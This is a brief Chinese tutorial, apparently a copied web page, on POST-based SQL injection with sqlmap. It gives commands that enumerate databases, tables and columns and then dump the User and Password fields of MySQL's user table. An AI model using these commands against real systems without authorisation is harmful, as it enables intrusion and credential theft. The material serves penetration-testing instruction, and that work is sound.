利用sqlmap进行POST注入
1.抓包,然后保存抓取到的内容。例如:保存为test.txt
2.列数据库:sqlmap.py -r test.txt -p username --dbs
注:-r表示加载一个文件,-p指定参数
3.选择一个数据库,比如选mysql
猜表 sqlmap.py -r test.txt -p username -D mysql --tables
4.猜列
sqlmap.py -r test.txt -p username -D mysql -T user --columns
5.猜数据
sqlmap.py -r test.txt -p username -D mysql -T user -C “User,Password” --dump
///////////////// /////// /// ////////////////
//// /// /// /// //// ////
//////////////// /// /// /// //// ////
/// /// /// /// //// ////
//////////////// /// ///// ////////////////
评论